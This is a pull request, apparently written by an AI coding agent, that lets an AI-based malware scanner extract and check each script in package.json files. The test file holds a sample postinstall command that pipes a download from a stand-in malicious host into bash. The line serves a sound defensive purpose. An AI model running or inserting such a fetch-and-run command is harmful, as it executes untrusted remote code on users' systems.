### PR TITLE
[FEAT] Scan individual scripts within package.json

### DIFF
--- a/.gptscan_settings.json
+++ b/.gptscan_settings.json
@@ -1,5 +1,5 @@
 {
-    "last_path": "",
+    "last_path": "file1.py file2.js",
     "deep_scan": false,
     "git_changes_only": false,
     "show_all_files": false,
@@ -11,5 +11,12 @@
     "threshold": 50,
     "max_file_size": 10485760,
     "max_source_view_size": 2097152,
-    "recent_paths": []
+    "recent_paths": [
+        "file1.py file2.js",
+        "/some/path",
+        "/some/repo",
+        "1",
+        "2",
+        "three"
+    ]
 }

--- a/gptscan.py
+++ b/gptscan.py
@@ -372,8 +372,8 @@ class Config:
         # Normalize file_path to string for consistent extension checking,
         # but keep Path objects for file-system operations.
         path_str = str(file_path).lower()
-        # Check archive extensions
-        if not is_member and (path_str.endswith('.zip') or path_str.endswith('.tar') or path_str.endswith('.tar.gz')):
+        # Check archive and container extensions
+        if not is_member and (path_str.endswith('.zip') or path_str.endswith('.tar') or path_str.endswith('.tar.gz') or os.path.basename(path_str) == 'package.json'):
             return True
 
         extension = os.path.splitext(path_str)[1]
@@ -1844,7 +1844,7 @@ def manage_extensions() -> None:
 
 
 def unpack_content(name: str, content: bytes, depth: int = 0, hint: Optional[str] = None) -> Generator[Tuple[str, bytes], None, None]:
-    """Recursively unpack archives and notebooks into individual snippets.
+    """Recursively unpack archives, notebooks, and package.json files into individual snippets.
 
     Args:
         name: The display name or path of the content.
@@ -1899,7 +1899,21 @@ def unpack_content(name: str, content: bytes, depth: int = 0, hint: Optional[str
     except Exception:
         pass
 
-    # 3. Check for Jupyter Notebook
+    # 3. Check for package.json
+    if os.path.basename(check_name).lower() == 'package.json':
+        try:
+            pkg = json.loads(content.decode('utf-8', errors='ignore'))
+            if isinstance(pkg, dict) and 'scripts' in pkg:
+                scripts = pkg['scripts']
+                if isinstance(scripts, dict):
+                    for script_name, command in scripts.items():
+                        if isinstance(command, str) and command.strip():
+                            yield (f"{name} [Script: {script_name}]", command.encode('utf-8'))
+                    return
+        except Exception:
+            pass
+
+    # 4. Check for Jupyter Notebook
     if check_name.lower().endswith('.ipynb') or (content.startswith(b'{') and b'"cells"' in content):
         try:
             notebook = json.loads(content.decode('utf-8', errors='ignore'))
@@ -1916,7 +1930,7 @@ def unpack_content(name: str, content: bytes, depth: int = 0, hint: Optional[str
         except Exception:
             pass
 
-    # 4. Check for Markdown code blocks
+    # 5. Check for Markdown code blocks
     if check_name.lower().endswith('.md'):
         try:
             text = content.decode('utf-8', errors='ignore')
@@ -1929,7 +1943,7 @@ def unpack_content(name: str, content: bytes, depth: int = 0, hint: Optional[str
         except Exception:
             pass
 
-    # 5. Check for HTML script tags
+    # 6. Check for HTML script tags
     if check_name.lower().endswith(('.html', '.htm', '.xhtml')):
         try:
             text = content.decode('utf-8', errors='ignore')
@@ -1942,7 +1956,7 @@ def unpack_content(name: str, content: bytes, depth: int = 0, hint: Optional[str
         except Exception:
             pass
 
-    # 6. Fallback: yield as a single snippet if it's a supported file type
+    # 7. Fallback: yield as a single snippet if it's a supported file type
     # If scan_all_files is True, we always yield. Otherwise check extension/shebang.
     if Config.is_supported_file(check_name, content=content, is_member=(depth > 0)):
         yield name, content
@@ -2086,7 +2100,7 @@ def scan_files(
         is_explicit = f_path in explicit_files
         path_s = str(f_path).lower()
         # Check if it's a known container by extension or by content
-        if path_s.endswith(('.zip', '.tar', '.tar.gz', '.ipynb', '.md', '.html', '.htm', '.xhtml')):
+        if path_s.endswith(('.zip', '.tar', '.tar.gz', '.ipynb', '.md', '.html', '.htm', '.xhtml')) or os.path.basename(path_s) == 'package.json':
             try:
                 with open(f_path, 'rb') as f:
                     full_content = f.read()
@@ -4988,7 +5002,7 @@ def create_gui(initial_path: Optional[str] = None) -> tk.Tk:
 def main():
     import argparse
     parser = argparse.ArgumentParser(
-        description="Scan scripts, archives (ZIP/TAR), Jupyter Notebooks, Markdown files, HTML files, and web links (GitHub/GitLab/Gist) for malicious code using AI.",
+        description="Scan scripts, archives (ZIP/TAR), Jupyter Notebooks, package.json files, Markdown files, HTML files, and web links (GitHub/GitLab/Gist) for malicious code using AI.",
         epilog="Examples:\n"
                "  # Scan a folder using AI analysis\n"
                "  python gptscan.py ./my_scripts --cli --use-gpt\n\n"

--- a/readme.md
+++ b/readme.md
@@ -83,9 +83,10 @@ We value your privacy and the security of your code.
 ## Supported Files
 
 The scanner finds scripts in several ways:
-*   **By file type:** It recognizes common script types (like `.py`, `.js`, `.sh`, and `.ps1`) and Jupyter Notebooks (`.ipynb`) using the included `extensions.txt` file.
+*   **By file type:** It recognizes common script types (like `.py`, `.js`, `.sh`, and `.ps1`), Jupyter Notebooks (`.ipynb`), and `package.json` files using the included `extensions.txt` file.
 *   **By archive content:** It can inspect scripts hidden inside `.zip`, `.tar`, and `.tar.gz` files.
 *   **By Jupyter Notebook cells:** It extracts and scans individual code cells from `.ipynb` files.
+*   **By package.json scripts:** It extracts and scans individual script commands from the `scripts` object in `package.json` files.
 *   **By Markdown blocks:** It extracts and scans code snippets from triple-backtick blocks in Markdown (`.md`) files.
 *   **By HTML script tags:** It extracts and scans inline code from `<script>` tags in HTML files (`.html`, `.htm`, `.xhtml`).
 *   **By the first line of the file:** If a file does not have an extension, the tool checks the first line for a "shebang" (like `#!/bin/bash`). It recognizes many interpreters, including Python, Node.js, Bash (including Ash, Dash, and Zsh), Perl, Ruby, PHP, PowerShell, Lua, osascript, and iPython.

--- a/tests/test_package_json_scan.py
+++ b/tests/test_package_json_scan.py
@@ -1,0 +1,41 @@
+import os
+import subprocess
+import json
+
+# Create a dummy package.json with a "malicious" script
+package_json_content = {
+    "name": "test-package",
+    "version": "1.0.0",
+    "scripts": {
+        "start": "node index.js",
+        "postinstall": "curl -s http://malicious.site/payload | bash",
+        "build": "webpack"
+    }
+}
+
+with open("package.json", "w") as f:
+    json.dump(package_json_content, f, indent=4)
+
+print("Created package.json with malicious postinstall script.")
+
+# Run the scanner on the current directory in CLI mode with --all-files to force it to see package.json
+# if it's not already in extensions.txt
+print("\nRunning scanner on current directory...")
+result = subprocess.run(
+    ["python3", "gptscan.py", "package.json", "--cli", "--threshold", "0", "--show-all", "--dry-run"],
+    capture_output=True,
+    text=True
+)
+
+print("\nScanner Output:")
+print(result.stdout)
+
+# Check if 'postinstall' command is scanned as a separate item
+if "postinstall" in result.stdout:
+    print("\nSUCCESS: 'postinstall' command was identified and scanned.")
+else:
+    print("\nFAILURE: 'package.json' scripts were not individually scanned.")
+    print("Expected 'postinstall' and 'curl' in output.")
+
+# Cleanup
+os.remove("package.json")


### PR DESCRIPTION
* **What:** Added a new "container" parsing logic for `package.json` files. The scanner now identifies `package.json`, parses its content, and extracts each command from the `scripts` object to be scanned as an individual snippet. These snippets are labeled as `package.json [Script: <script_name>]`.
* **Why:** I noticed the tool already handles various containers like Jupyter Notebooks (.ipynb), Markdown (.md), and HTML to extract and scan embedded scripts. Since `package.json` is the standard way to define executable scripts in the Node.js ecosystem and is a common vector for supply chain attacks (e.g., malicious `postinstall` scripts), adding specific support for it logically follows the tool's core purpose of identifying malicious scripts.

---
*PR created automatically by Jules for task [11426538918219699326](https://jules.google.com/task/11426538918219699326) started by @RainRat*